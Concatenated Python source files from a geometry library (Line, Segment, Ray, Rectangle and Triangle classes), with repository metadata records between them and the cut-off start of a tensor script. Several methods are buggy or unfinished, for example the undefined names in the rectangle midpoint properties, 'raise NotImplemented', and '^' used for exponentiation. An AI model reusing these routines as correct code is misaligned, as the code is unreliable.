Returns True iff p is a point and is collinear with l.A and
l.B.
Returns True iff p is a line and p.A and p.B are collinear
with l.A and l.B.
'''
otherType = type(other)
if issubclass(otherType, Point):
return self.A.isCollinear(other, self.B)
if issubclass(otherType, Line):
if not self.A.isCollinear(other.A, other.B):
return False
return self.B.isCollinear(other.A, other.B)
raise TypeError('unable to contain type {t}'.format(t=otherType))
def flip(self):
'''
:returns: None
Swaps the positions of A and B.
'''
tmp = self.A.xyz
self.A = self.B
self.B = tmp
def doesIntersect(self, other):
'''
:param: other - Line subclass
:return: boolean
Returns True iff:
ccw(self.A,self.B,other.A) * ccw(self.A,self.B,other.B) <= 0
and
ccw(other.A,other.B,self.A) * ccw(other.A,other.B,self.B) <= 0
'''
if self.A.ccw(self.B, other.A) * self.A.ccw(self.B, other.B) > 0:
return False
if other.A.ccw(other.B, self.A) * other.A.ccw(other.B, self.B) > 0:
return False
return True
def isParallel(self, other):
'''
:param: other - Line subclass
:return: boolean
Returns true if the two lines do not intersect and are not collinear.
'''
return not self.doesIntersect(other)
def isCollinear(self, other):
'''
:param: other - Line subclass
:return: boolean
Returns true if the two lines are collinear.
'''
return other in self
def intersection(self, other):
'''
:param: other - Line subclass
:return: Point subclass
Returns a Point object with the coordinates of the intersection
between the current line and the other line.
Will raise Parallel() if the two lines are parallel.
Will raise Collinear() if the two lines are collinear.
'''
if self.isCollinear(other):
msg = '{!r} and {!r} are collinear'
raise CollinearLines(msg.format(self, other))
d0 = self.A - self.B
d1 = other.A - other.B
denominator = (d0.x * d1.y) - (d0.y * d1.x)
if denominator == 0:
msg = '{!r} and {!r} are parallel'
raise ParallelLines(msg.format(self, other))
cp0 = self.A.cross(self.B)
cp1 = other.A.cross(other.B)
x_num = (cp0 * d1.x) - (d0.x * cp1)
y_num = (cp0 * d1.y) - (d0.y * cp1)
p = Point(x_num / denominator, y_num / denominator)
if p in self and p in other:
return p
msg = "found point {!r} but not in {!r} and {!r}"
raise ParallelLines(msg.format(p, self, other))
def distanceFromPoint(self, point):
'''
:param: point - Point subclass
:return: float
Distance from the line to the given point.
'''
# XXX planar distance, doesn't take into account z ?
d = self.m
n = (d.y * point.x) - (d.x * point.y) + self.A.cross(self.B)
return abs(n / self.A.distance(self.B))
def isNormal(self, other):
'''
:param: other - Line subclass
:return: boolean
Returns True if this line is perpendicular to the other line.
'''
return abs(self.degreesBetween(other)) == 90.0
def radiansBetween(self, other):
'''
:param: other - Line subclass
:return: float
Returns the angle measured between two lines in radians
with a range of [0, 2 * math.pi].
'''
# a dot b = |a||b| * cos(theta)
# a dot b / |a||b| = cos(theta)
# cos-1(a dot b / |a||b|) = theta
# translate each line so that it passes through the origin and
# produce a new point whose distance (magnitude) from the
# origin is 1.
#
a = Point.unit(self.A, self.B)
b = Point.unit(other.A, other.B)
# in a perfect world, after unit: |A| = |B| = 1
# which is a noop when dividing the dot product of A,B
# but sometimes the lengths are different.
#
# let's just assume things are perfect and the lengths equal 1.
return math.acos(a.dot(b))
def degreesBetween(self, other):
'''
:param: other - Line subclass
:return: float
Returns the angle between two lines measured in degrees.
'''
return math.degrees(self.radiansBetween(other))
class Segment(Line):
'''
A Line subclass with finite length.
'''
@property
def length(self):
'''
The scalar distance between A and B, float.
'''
return self.A.distance(self.B)
@property
def midpoint(self):
'''
The point between A and B, Point subclass.
'''
return self.A.midpoint(self.B)
def __eq__(self, other):
'''
x == y iff:
((x.A == y.A) and (x.B == y.B))
or
((x.A == y.B) and (x.B == y.A))
'''
return len(set(self.AB + other.AB)) == 2
def __contains__(self, other):
'''
XXX modified to allow segments to contain lines
p in s
Returns True iff:
A,point,B are collinear and A.xyz <= point.xyz <= B.xyz
'''
if not super().__contains__(other):
return False
otherType = type(other)
if issubclass(otherType, Point):
return other.isBetween(self.A, self.B)
if issubclass(otherType, Line):
return all([other.A.isBetween(self.A, self.B),
other.B.isBetween(self.A, self.B)])
raise TypeError('unable to contain type {t}'.format(t=otherType))
@property
def normal(self):
'''
:return: Segment
Returns a segment normal (perpendicular) to this segment.
'''
return Segment.fromLine(super().normal)
class Ray(Line):
'''
Rays have head and tail vertices with an infinite length in the
direction of the head vertex.
o----->
'''
@property
def head(self):
'''
The start (endpoint) of the ray, Point subclass.
'''
return self.A
@head.setter
def head(self, newValue):
self.A = newValue
@property
def tail(self):
'''
A point in the infinite direction of the ray, Point subclass.
'''
return self.B
@tail.setter
def tail(self, newValue):
self.B = newValue
def __eq__(self, other):
'''
x == y
Returns true if x.head == y.head and y.tail.isCollinear(x.head,x.tail)
'''
return (self.head == other.head) and other.tail.isCollinear(
self.head, self.tail)
def __contains__(self, point):
'''
Returns true if point can be found in Ray.
'''
if not self.A.isCollinear(point, self.B):
return False
if self.A.isBetween(point, self.B):
return False
# point.isBetween(self.A,self.B) or self.B.isBetween(self.A,point):
return True
# intersection is tricky need to override
def doesIntersect(self, other):
raise NotImplementedError('doesIntersect')
def isParallel(self, other):
raise NotImplementedError('isParallel')
def isCollinear(self, other):
raise NotImplementedError('isCollinear')
def intersection(self, other):
raise NotImplementedError('intersection')
@property
def alpha(self):
'''
Angle in radians relative to the X axis.
'''
raise NotImplementedError('alpha')
@property
def beta(self):
'''
Angle in radians relative to the Y axis.
'''
raise NotImplementedError('beta')
@property
def gamma(self):
'''
Angle in radians relative to the Z axis.
'''
raise NotImplementedError('gamma')
@property
def normal(self):
'''
:return: Ray
Returns a ray normal (perpendicular) to this segment.
'''
return Ray.fromLine(super().normal)
# rays can be treated much like vectors so many of the point operations
# can be reused here
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/line.py",
"copies": "1",
"size": "14349",
"license": "mit",
"hash": 4776533943774270000,
"line_mean": 22.8752079867,
"line_max": 78,
"alpha_frac": 0.5185727228,
"autogenerated": false,
"ratio": 3.8823051948051948,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9900877917605194,
"avg_score": 0,
"num_lines": 601
} |
'''a pythonic Rectangle
Provides an implementation of a rectangle designed to be easy to use:
- built on a very friendly Point class
- provides a wealth of accessors that are read-write
'''
import random
import math
from . import Point
from .exceptions import *
class Rectangle(object):
'''
Implements a Rectangle object in the XY plane defined by
an origin point and scalars length and width.
All other properties are derived.
Note: Origin may have a non-zero z coordinate.
'''
@classmethod
def randomSizeAndLocation(cls, radius, widthLimits,
heightLimits, origin=None):
'''
:param: radius - float
:param: widthLimits - iterable of floats with length >= 2
:param: heightLimits - iterable of floats with length >= 2
:param: origin - optional Point subclass
:return: Rectangle
'''
r = cls(widthLimits, heightLimits, origin)
r.origin = Point.randomLocation(radius, origin)
@classmethod
def randomSize(cls, widthLimits, heightLimits, origin=None):
'''
:param: widthLimits - iterable of integers with length >= 2
:param: heightLimits - iterable of integers with length >= 2
:param: origin - optional Point subclass
:return: Rectangle
'''
r = cls(0, 0, origin)
r.w = random.randint(widthLimits[0], widthLimits[1])
r.h = random.randint(heightLimits[0], heightLimits[1])
return r
@classmethod
def randomLocation(cls, radius, width, height, origin=None):
'''
:param: radius - float
:param: width - float
:param: height - float
:param: origin - optional Point subclass
:return: Rectangle
'''
return cls(width,
height,
Point.randomLocation(radius, origin))
def __init__(self, origin=None, width=1, height=1, theta=0):
'''
:param: width - float X distance from origin.x
:param: height - float Y distance from origin.y
:param: origin - Point subclass
:return: Rectangle
Returns a unit square anchored at the origin by default.
'''
try:
self.origin = iter(origin)
except TypeError:
pass
self.width = width
self.height = height
@property
def origin(self):
'''
Point describing the origin of the rectangle. Defaults to (0,0,0).
'''
try:
return self._origin
except AttributeError:
pass
self._origin = Point()
return self._origin
@origin.setter
def origin(self, newOrigin):
self.origin.xyz = newOrigin
@property
def O(self):
'''
Shorthand for origin, Point.
'''
return self.origin
@O.setter
def O(self, newO):
self.origin = newO
@property
def width(self):
'''
Width of the rectangle, float.
'''
try:
return self._width
except AttributeError:
pass
self._width = 0
return self._width
@width.setter
def width(self, newWidth):
self._width = float(newWidth)
@property
def height(self):
'''
Height of the rectangle, float.
'''
try:
return self._height
except AttributeError:
pass
self._height = 0
return self._height
@height.setter
def height(self, newHeight):
self._height = float(newHeight)
@property
def w(self):
'''
Shorthand for width, float.
'''
return self.width
@w.setter
def w(self, newWidth):
self.width = newWidth
@property
def h(self):
'''
Shorthand for height, float.
'''
return self.height
@h.setter
def h(self, newHeight):
self.height = newHeight
@property
def x(self):
'''
Shorthand for origin.x, float.
'''
return self.origin.x
@x.setter
def x(self, newX):
self.origin.x = newX
@property
def y(self):
'''
Shorthand for origin.y, float.
'''
return self.origin.y
@y.setter
def y(self, newY):
self.origin.y = newY
@property
def z(self):
'''
Shorthand for origin.z, float.
'''
return self.origin.z
@z.setter
def z(self, newZ):
self.origin.z = newZ
@property
def xy(self):
'''
Shorthand for origin.xy, iterable of floats.
'''
return self.origin.xy
@xy.setter
def xy(self, newXY):
self.origin.xy = newXY
@property
def xz(self):
'''
Shorthand for origin.xz, iterable of floats
'''
return self.origin.xz
@xz.setter
def xz(self, newXZ):
self.origin.xz = newXZ
@property
def yz(self):
'''
Shorthand for origin.yz, iterable of floats.
'''
return self.origin.yz
@yz.setter
def yz(self, newYZ):
self.origin.yz = newYZ
@property
def xyz(self):
'''
Shorthand for origin.xyz, iterable of floats.
'''
return self.origin.xyz
@xyz.setter
def xyz(self, newXYZ):
self.origin.xyz = newXYZ
@property
def minX(self):
'''
Minimum X coordinate boundry, float.
'''
return self.origin.x
@property
def midX(self):
'''
Middle X coordinate, float.
'''
return self.origin.x + (self.width / 2)
@property
def maxX(self):
'''
Maximum X coordinate boundry, float.
'''
return self.origin.x + self.width
@property
def minY(self):
'''
Minimum Y coordinate, float.
'''
return self.origin.y
@property
def midY(self):
'''
Middle Y coordinate, float.
'''
return self.origin.y + (self.height / 2)
@property
def maxY(self):
'''
Maximum Y coordinate, float.
'''
return self.origin.y + self.height
# Note: The setters for the following points don't actually
# create that point. Instead they adjust the rectangle's
# origin with respect to the requested point.
@property
def A(self):
'''
Point whose coordinates are (minX,minY,origin.z), Point.
'''
return Point(self.origin)
@A.setter
def A(self, newA):
self.origin = newA
@property
def B(self):
'''
Point whose coordinates are (maxX,minY,origin.z), Point.
'''
return Point(self.maxX, self.minY, self.origin.z)
@B.setter
def B(self, newB):
self.origin = newB
self.origin.x -= self.width
@property
def C(self):
'''
Point whose coordinates are (maxX,maxY,origin.z), Point.
'''
return Point(self.maxX, self.maxY, self.origin.z)
@C.setter
def C(self, newC):
self.origin = newC
self.origin.x -= self.width
self.origin.y -= self.height
@property
def D(self):
'''
Point whose coordinates are (minX,maxY,origin.Z), Point.
'''
return Point(self.minX, self.maxY, self.origin.z)
@D.setter
def D(self, newD):
self.origin = newD
self.origin.y -= self.height
@property
def center(self):
'''
Point whose coordinates are (midX,midY,origin.z), Point.
'''
return Point(self.midX, self.midY, self.origin.z)
@center.setter
def center(self, newCenter):
self.origin = newCenter
self.origin.x -= (self.width / 2)
self.origin.y -= (self.height / 2)
@property
def midAB(self):
'''
Point inbetween A and B, Point.
'''
return self.A.midpoint(B)
@midAB.setter
def midAB(self, newMidAB):
self.origin = newMidAB
self.origin.x -= (self.width / 2)
@property
def midBC(self):
'''
Point inbetween B and C, Point.
'''
return self.B.midpoint(C)
@midBC.setter
def midBC(self, newMidBC):
self.origin = newMidBC
self.origin.x -= self.width
self.origin.y -= (self.height / 2)
@property
def midCD(self):
'''
Point inbetween C and D, Point.
'''
return self.C.midpoint(D)
@midCD.setter
def midCD(self, newMidCD):
self.origin = newMidCD
self.origin.x -= (self.width / 2)
self.origin.y -= self.height
@property
def midAD(self):
'''
Point inbetween A and D, Point.
'''
return self.A.midpoint(D)
@midAD.setter
def midAD(self, newMidAD):
self.origin = newMidAD
self.origin.y -= (self.height / 2)
@property
def perimeter(self):
'''
The perimeter of the rectangle, float.
'''
return (self.width * 2) + (self.height * 2)
@property
def area(self):
'''
The area of the rectangle, float.
'''
return self.width * self.height
@property
def isSquare(self):
'''
Is true if self.width == self.height.
'''
return self.width == self.height
@property
def isRectangle(self):
'''
Is true if self.width != self.height.
'''
return self.width != self.height
@property
def isCCW(self):
'''
Is true if the angle ABC denotes a counter clockwise rotation
with respect to the Z axis.
'''
return self.A.isCCW(self.B, self.C)
@property
def ccw(self):
'''
Returns the CCW value for the rectangle using the angle ABC with
respect to the Z axis.
>0 : counter clockwise and the area of the parallelpiped
0 : collinear, not genearlly possible in a well-formed rectangle
<0 : clockwise and the negative area of the parallelpipled
'''
return self.A.ccw(self.B, self.C)
@property
def mapping(self):
'''
A mapping of rectangle attribute names to attribute values, dict.
'''
return {'origin': self.origin,
'width': self.width,
'height': self.height}
def __str__(self):
'''
'''
output = 'origin={origin},width={width},height={height}'
return output.format(**self.mapping)
def __repr__(self):
'''
'''
return '{klass}({args})'.format(klass=self.__class__.__name__,
args=str(self))
def __eq__(self, other):
'''
x == y iff:
x.origin == y.origin
x.width == y.width
x.height == y.height
'''
oeq = self.origin == other.origin
weq = self.w == other.w
heq = self.h == other.h
return oeq and weq and heq
def __contains__(self, other):
'''
:param: other - Rectangle subclass
:return: boolean
x in y iff:
(y.A in x) or (y.B in x) or (y.C in x) or (y.D in x)
'''
# does ccw/cw of self or other matter here?
if self.containsPoint(other.A):
return True
if self.containsPoint(other.B):
return True
if self.containsPoint(other.C):
return True
if self.containsPoint(other.D):
return True
return False
def scale(self, dx=1.0, dy=1.0):
'''
:param: dx - optional float
:param: dy - optional float
Scales the rectangle's width and height by dx and dy.
'''
self.width *= dx
self.height *= dy
def inset(self, other, percentage):
'''
:param: other - Rectangle subclass
:param: percentagle - float
'''
raise NotImplemented('inset')
def union(self, other):
'''
:param: other - Rectangle subclass
'''
# returns a rectangle composed of the bounds of self and other
raise NotImplemented('union')
def intersect(self, other):
'''
:param: other - Rectangle subclass
'''
# returns an iterable of rectangles that compose the intersection
# a limit of 0 to 4 rects?
raise NotImplemented('intersect')
def containsPoint(self, point, Zorder=False):
'''
:param: point - Point subclass
:param: Zorder - optional Boolean
Is true if the point is contain in the rectangle or
along the rectangle's edges.
If Zorder is True, the method will check point.z for
equality with the rectangle origin's Z coordinate.
'''
if not point.isBetweenX(self.A, self.B):
return False
if not point.isBetweenY(self.A, self.D):
return False
if Zorder:
return point.z == self.origin.z
return True
def zorder(self, other):
'''
:param: other - Rectangle subclass
:return: float
>0: self < other
0: self eq other
<0: self > other
'''
return other.origin.z - self.origin.z
def flipX(self):
'''
:return: None
Inverts the X axis of the rectangle.
'''
self.width *= -1
def flipY(self):
'''
:return: None
Inverts the Y axis of the rectangle.
'''
self.height *= -1
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/rectangle.py",
"copies": "1",
"size": "13704",
"license": "mit",
"hash": -362437887190386200,
"line_mean": 22.4657534247,
"line_max": 74,
"alpha_frac": 0.5340776416,
"autogenerated": false,
"ratio": 4.068883610451306,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0003503485968538696,
"num_lines": 584
} |
''' a pythonic Triangle
'''
import math
import collections
import itertools
from . import Point, Segment, Circle
from .constants import Epsilon, Half_Pi, nearly_eq, Sqrt_3
from .exceptions import *
class Triangle(object):
'''a pythonic Triangle
Implements a Triangle object in the XY plane having three
non-coincident vertices and three intersecting edges.
Vertices are labeled; 'A', 'B' and 'C'.
Edges are labeled; 'AB', 'BC' and 'AC'.
The length of edges opposite each vertex are labeled:
'a' for the side opposite vertex A.
'b' for the side opposite vertex B.
'c' for the side opposite vertex C.
Interior angles in radians are labeled:
'alpha' for CAB
'beta' for ABC
'gamma' for BCA
Usage:
>>> a = Triangle()
>>> b = Triangle(A,B,C) # A,B,C are Points or Point equivalents
>>> c = Triangle([p,q,r]) # p,q,r are Points or Point equivalents
>>> d = Triangle([x,y,z],[x,y,z],[x,y,z])
>>> e = Triangle(A=p0,B=p1,C=p2)
'''
vertexNames = 'ABC'
@classmethod
def random(cls, origin=None, radius=1):
'''
:origin: - optional Point subclass
:radius: - optional float
:return: Triangle
Creates a triangle with random coordinates in the circle
described by (origin,radius). If origin is unspecified, (0,0)
is assumed. If the radius is unspecified, 1.0 is assumed.
'''
# XXX no collinearity checks, possible to generate a
# line (not likely, just possible).
#
pts = set()
while len(pts) < 3:
p = Point.random(origin, radius)
pts.add(p)
return cls(pts)
@classmethod
def equilateral(cls, origin=None, side=1):
'''
:origin: optional Point
:side: optional float describing triangle side length
:return: Triangle initialized with points comprising a
equilateral triangle.
XXX equilateral triangle definition
'''
o = Point(origin)
base = o.x + side
h = 0.5 * Sqrt_3 * side + o.y
return cls(o, [base, o.y], [base / 2, h])
#return cls.withAngles(alpha=60,beta=60,gamma=60,base=side,inDegrees=True)
@classmethod
def isosceles(cls, origin=None, base=1, alpha=90):
'''
:origin: optional Point
:base: optional float describing triangle base length
:return: Triangle initialized with points comprising a
isosceles triangle.
XXX isoceles triangle definition
'''
o = Point(origin)
base = o.x + base
return cls(o, [base, o.y], [base / 2, o.y + base])
@classmethod
def withAngles(cls, origin=None, base=1, alpha=None,
beta=None, gamma=None, inDegrees=False):
'''
:origin: optional Point
:alpha: optional float describing length of the side opposite A
:beta: optional float describing length of the side opposite B
:gamma: optional float describing length of the side opposite C
:return: Triangle initialized with points comprising the triangle
with the specified angles.
'''
raise NotImplementedError("withAngles")
@classmethod
def withSides(cls, origin=None, a=1, b=1, c=1):
'''
:origin: optional Point
:a: optional float describing length of the side opposite A
:b: optional float describing length of the side opposite B
:c: optional float describing length of the side opposite C
:return: Triangle initialized with points comprising the triangle
with the specified side lengths.
If only 'a' is specified, an equilateral triangle is returned.
'''
raise NotImplementedError("withSides")
@classmethod
def unit(cls):
'''
Returns a unit triangle.
'''
return cls(Point.units())
def __init__(self, *args, **kwds):
self(*args, **kwds)
def __call__(self, *args, **kwds):
'''
Arguments are:
- positional arguments corresponding to A, B, and C
- sequence of Point or point equivalents
- keyword mappings: A, B and C
'''
# XXX not happy with this yet
if len(args) == 0 and len(kwds) == 0:
return
if len(args) == 1:
if issubclass(type(args[0]), Point):
self.A = args[0]
else:
if isinstance(args[0], collections.Iterable):
if len(args[0]) == 1:
self.A = args[0]
if len(args[0]) == 2:
self.AB = args[0]
if len(args[0]) == 3:
self.ABC = args[0]
if len(args) == 2:
self.AB = args
if len(args) >= 3:
self.ABC = args[:3]
for name in self.vertexNames:
try:
setattr(self, name, kwds[name])
except:
pass
@property
def A(self):
'''
First vertex of triangle, Point subclass.
'''
try:
return self._A
except AttributeError:
pass
self._A = Point()
return self._A
@A.setter
def A(self, newValue):
self.A.xyz = newValue
@property
def B(self):
'''
Second vertex of triangle, Point subclass.
'''
try:
return self._B
except AttributeError:
pass
self._B = Point(1, 0)
return self._B
@B.setter
def B(self, newValue):
self.B.xyz = newValue
@property
def C(self):
'''
Third vertex of triangle, Point subclass.
'''
try:
return self._C
except AttributeError:
pass
self._C = Point(0, 1)
return self._C
@C.setter
def C(self, newValue):
self.C.xyz = newValue
@property
def ABC(self):
'''
A list of the triangle's vertices, list.
'''
try:
return self._ABC
except AttributeError:
pass
self._ABC = [self.A, self.B, self.C]
return self._ABC
@ABC.setter
def ABC(self, iterable):
self.A, self.B, self.C = iterable
@property
def AB(self):
'''
Vertices A and B, list.
'''
try:
return self._AB
except AttributeError:
pass
self._AB = [self.A, self.B]
return self._AB
@AB.setter
def AB(self, iterable):
self.A, self.B = iterable
@property
def BA(self):
'''
Vertices B and A, list.
'''
try:
return self._BA
except AttributeError:
pass
self._BA = [self.B, self.A]
return self._BA
@BA.setter
def BA(self, iterable):
self.B, self.A = iterable
@property
def AC(self):
'''
Vertices A and C, list.
'''
try:
return self._AC
except AttributeError:
pass
self._AC = [self.A, self.C]
return self._AC
@AC.setter
def AC(self, iterable):
self.A, self.C = iterable
@property
def CA(self):
'''
Vertices C and A, list.
'''
try:
return self._CA
except AttributeError:
pass
self._CA = [self.C, self.A]
return self._CA
@CA.setter
def CA(self, iterable):
self.C, self.A = iterable
@property
def BC(self):
'''
Vertices B and C, list.
'''
try:
return self._BC
except AttributeError:
pass
self._BC = [self.B, self.C]
return self._BC
@BC.setter
def BC(self, iterable):
self.B, self.C = iterable
@property
def CB(self):
'''
Vertices C and B, list.
'''
try:
return self._CB
except AttributeError:
pass
self._CB = [self.C, self.B]
return self._CB
@CB.setter
def CB(self, iterable):
self.C, self.B = iterable
@property
def vertices(self):
'''
Alias for property "ABC", list.
'''
return self.ABC
@vertices.setter
def vertices(self, iterable):
self.ABC = iterable
@property
def segments(self):
'''
A list of the Triangle's line segments [AB, BC, AC], list.
'''
return [Segment(self.AB),
Segment(self.BC),
Segment(self.AC)]
@property
def hypotenuse(self):
'''
The longest side of the triangle, Segment.
If the triangle is an equilateral, the first Segment
in the segments property is returned.
'''
return max(self.segments,key=lambda s:s.length)
@property
def centroid(self):
'''
Intersection of the medians, Point.
'''
return sum(self.vertices) / 3
@property
def incenter(self):
'''
The intersection of angle bisectors, Point.
'''
return sum([s * p for s, p in zip(self.sides, self.vertices)]) / 3
@property
def inradius(self):
'''
The radius of the triangle's incircle, float.
'''
## XXX need to know the points on the triangle
## where the incircle touches to verify the
## inradius computation. Could verify by
## intersecting each segment with the circle
## and checking to make sure the segment is
## a tangent.
return (self.area * 2) / self.perimeter
@property
def incircle(self):
'''
The circle inscribed in the triangle whose center
is at 'incenter' with radius 'inradius', Circle.
'''
return Circle(self.incenter, self.inradius)
@property
def circumcenter(self):
'''
The intersection of the median perpendicular bisectors, Point.
The center of the circumscribed circle, which is the circle that
passes through all vertices of the triangle.
https://en.wikipedia.org/wiki/Circumscribed_circle#Cartesian_coordinates_2
BUG: only finds the circumcenter in the XY plane
'''
if self.isRight:
return self.hypotenuse.midpoint
if self.A.isOrigin:
t = self
else:
# translate triangle to origin
t = Triangle(self.A - self.A, self.B - self.A, self.C - self.A)
# XXX translation would be easier by defining add and sub for points
# t = self - self.A
if not t.A.isOrigin:
raise ValueError('failed to translate {} to origin'.format(t))
BmulC = t.B * t.C.yx
d = 2 * (BmulC.x - BmulC.y)
bSqSum = sum((t.B ** 2).xy)
cSqSum = sum((t.C ** 2).xy)
x = (((t.C.y * bSqSum) - (t.B.y * cSqSum)) / d) + self.A.x
y = (((t.B.x * cSqSum) - (t.C.x * bSqSum)) / d) + self.A.y
return Point(x, y)
@property
def circumradius(self):
'''
Distance from the circumcenter to all the verticies in
the Triangle, float.
'''
return (self.a * self.b * self.c) / (self.area * 4)
@property
def circumcircle(self):
'''
A circle whose center is equidistant from all the
vertices in the triangle, Circle.
'''
return Circle(self.circumcenter, self.circumradius)
@property
def orthocenter(self):
'''
The intersection of the altitudes of the triangle, Point.
'''
raise NotImplementedError('orthocenter')
@property
def midpoints(self):
'''
The midpoints for segments AB, BC and AC, list of Points.
'''
return [s.midpoint for s in self.segements]
@property
def alpha(self):
'''
The angle described by angle CAB in radians, float.
'''
return Segment(self.CA).radiansBetween(Segment(self.BA))
@property
def beta(self):
'''
The angle described by angle ABC in radians, float.
'''
return Segment(self.AB).radiansBetween(Segment(self.CB))
@property
def gamma(self):
'''
The angle described by angle BCA in radians, float.
'''
return Segment(self.BC).radiansBetween(Segment(self.AC))
@property
def angles(self):
'''
List of angles [alpha, beta, gamma], list of floats.
'''
return [self.alpha, self.beta, self.gamma]
@property
def a(self):
'''
The length of line segment BC, opposite vertex A, float.
'''
return abs(self.B.distance(self.C))
@property
def b(self):
'''
The length of line segment AC, opposite vertex B, float.
'''
return abs(self.A.distance(self.C))
@property
def c(self):
'''
The length of line segment AB, opposite vertex C, float.
'''
return abs(self.A.distance(self.B))
@property
def sides(self):
'''
A list of side lengths [a, b, c], list of floats.
'''
return [self.a, self.b, self.c]
@property
def altitudes(self):
'''
A list of the altitudes of each vertex [AltA, AltB, AltC], list of
floats.
An altitude is the shortest distance from a vertex to the side
opposite of it.
'''
a = self.area * 2
return [a / self.a, a / self.b, a / self.c]
@property
def isCCW(self):
'''
True if ABC has a counter-clockwise rotation, boolean.
'''
return self.A.isCCW(self.B, self.C)
@property
def ccw(self):
'''
Result of ccw(A,B,C), float.
'''
return self.A.ccw(self.B, self.C)
@property
def area(self):
'''
Area of the triangle, float.
Performance note: computed via Point.ccw (subtractions and
multiplications).
'''
return abs(self.ccw) / 2
@property
def heronsArea(self):
'''
Heron's forumla for computing the area of a triangle, float.
Performance note: contains a square root.
'''
s = self.semiperimeter
return math.sqrt(s * ((s - self.a) * (s - self.b) * (s - self.c)))
@property
def perimeter(self):
'''
Perimeter of the triangle: |AB|+|BC|+|AC|, float.
'''
return sum(self.sides)
@property
def semiperimeter(self):
'''
Semiperimeter of the triangle: (|AB|+|BC|+|AC|) / 2, float.
'''
return self.perimeter / 2
@property
def isEquilateral(self):
'''
True if all sides of the triangle are the same length.
All equilateral triangles are also isosceles.
All equilateral triangles are also acute.
'''
if not nearly_eq(self.a, self.b):
return False
if not nearly_eq(self.b, self.c):
return False
return nearly_eq(self.a, self.c)
@property
def isIsosceles(self):
'''
True if two sides of the triangle are the same length.
'''
if self.a == self.b:
return True
if self.a == self.c:
return True
return self.b == self.c
@property
def isScalene(self):
'''
True if all sides are unequal in length.
'''
return self.a != self.b != self.c
@property
def isRight(self):
'''
True if one angle is equal to Pi/2 radians.
'''
return any([nearly_eq(Half_Pi, a) for a in self.angles])
@property
def isObtuse(self):
'''
True if one angle is greater than Pi/2 radians.
'''
return any([a > Half_Pi for a in self.angles])
@property
def isAcute(self):
'''
True if all angles are less than 90 degrees ( Pi/2 radians).
'''
return all([a < Half_Pi for a in self.angles])
def __str__(self):
# if the mapping behavior stays in
# candidate for pointcollection
# return ', '.join(['{}=({})'.format(l,p) for l,p in self])
return 'A={t.A!r}, B={t.B!r}, C={t.C!r}'.format(t=self)
def __repr__(self):
return '{o.__class__.__name__}({o!s})'.format(o=self)
#
# XXX treating a triangle like a mapping, not sure about this.
#
def __len__(self):
return 3
def __iter__(self):
return zip(self.vertexNames, self.vertices)
def __getitem__(self, key):
'''
'''
if key in ['A', 0]:
return self.A
if key in ['B', 1]:
return self.B
if key in ['C', 2]:
return self.C
raise KeyError(key)
def __setitem__(self, key, newValue):
if key in ['A', 0]:
return self.A
if key in ['B', 1]:
return self.B
if key in ['C', 2]:
return self.C
raise KeyError(key)
##
# end of mapping gorp
##
def __eq__(self, other):
'''
x == y
True iff len(set(x.vertices).difference(set(y.vertices))) == 0
The ordering of points in either Triangle is not considered.
'''
a = set(self.vertices)
b = set(other.vertices)
return len(a.difference(b)) == 0
def congruent(self, other):
'''
True iff all self and other angles are equal AND
all self and other sides are equal.
'''
a = set(self.angles)
b = set(other.angles)
if len(a) != len(b) or len(a.difference(b)) != 0:
return False
a = set(self.sides)
b = set(other.sides)
return len(a) == len(b) and len(a.difference(b)) == 0
def __contains__(self, point):
'''
:param: point - Point subclass
:return: boolean
True if point is inside the triangle or on any of it's sides.
'''
try:
r = [self.A.isCCW(self.B, point),
self.B.isCCW(self.C, point),
self.C.isCCW(self.A, point)]
except CollinearPoints:
# point is on the lines AB, BC, or CA and that counts.
return True
return not (any(r) and not all(r))
def swap(self, side='AB', inplace=False):
'''
:side: - optional string
:inplace: - optional boolean
:return: Triangle with flipped side.
The optional side paramater should have one of three values:
AB, BC, or AC.
Changes the order of the triangle's points, swapping the
specified points. Doing so will change the results of isCCW
and ccw.
'''
try:
flipset = {'AB': (self.B.xyz, self.A.xyz, self.C.xyz),
'BC': (self.A.xyz, self.C.xyz, self.B.xyz),
'AC': (self.C.xyz, self.B.xyz, self.A.xyz)}[side]
except KeyError as e:
raise KeyError(str(e))
if inplace:
self.ABC = flipset
return self
return Triangle(flipset)
def doesIntersect(self, other):
'''
:param: other - Triangle or Line subclass
:return: boolean
Returns True iff:
Any segment in self intersects any segment in other.
'''
otherType = type(other)
if issubclass(otherType, Triangle):
for s in self.segments.values():
for q in other.segments.values():
if s.doesIntersect(q):
return True
return False
if issubclass(otherType, Line):
for s in self.segments.values():
if s.doesIntersect(other):
return True
return False
msg = "expecting Line or Triangle subclasses, got '{}'"
raise TypeError(msg.format(otherType))
# arithmetic methods
# s = scalar
# t = Triangle()
# u = Triangle()
# p = Point()
#
# t op s -> apply op to vertices using scalar
# t op p -> apply op to vertices using point
# t op u -> apply op to corresponding vertices (?)
#
# should be moved out to a parent ngon class
# maybe pointcollection?
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/triangle.py",
"copies": "1",
"size": "20631",
"license": "mit",
"hash": 3652244357389421600,
"line_mean": 23.1298245614,
"line_max": 82,
"alpha_frac": 0.5263923222,
"autogenerated": false,
"ratio": 3.986666666666667,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5013058988866667,
"avg_score": null,
"num_lines": null
} |
# A Python implementation of Ailey's matlab tensor code.
import os
import numpy as np
import math
import SimpleITK as sitk
from scipy import ndimage
import nibabel as nib
from PIL import Image
import scipy.misc
from scipy import signal
import warnings
#warnings.filterwarnings("ignore")
def doggen(sigma):
"""
Helper function to generate derivatives of Gaussian kernels, in either 1D, 2D, or 3D.
Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
:param sigma: Sigma for use (see defaults in generate_FSL_structure_tensor)
:return: Derivative of Gaussian kernel with dimensions of sigma.
"""
halfsize = np.ceil(3 * np.max(sigma))
x = range(np.single(-halfsize), np.single(halfsize + 1)); # Python colon is not inclusive at end, while MATLAB is.
dim = len(sigma);
if dim == 1:
X = np.array(x); # Remember that, by default, numpy arrays are elementwise multiplicative
X = X.astype(float);
k = -X * np.exp(-X**2/(2 * sigma**2));
elif dim == 2:
[X, Y] = np.meshgrid(x, x);
X = X.astype(float);
Y = Y.astype(float);
k = -X * np.exp(-X**2/(2*sigma[0]^2) * np.exp(-Y**2))
elif dim == 3:
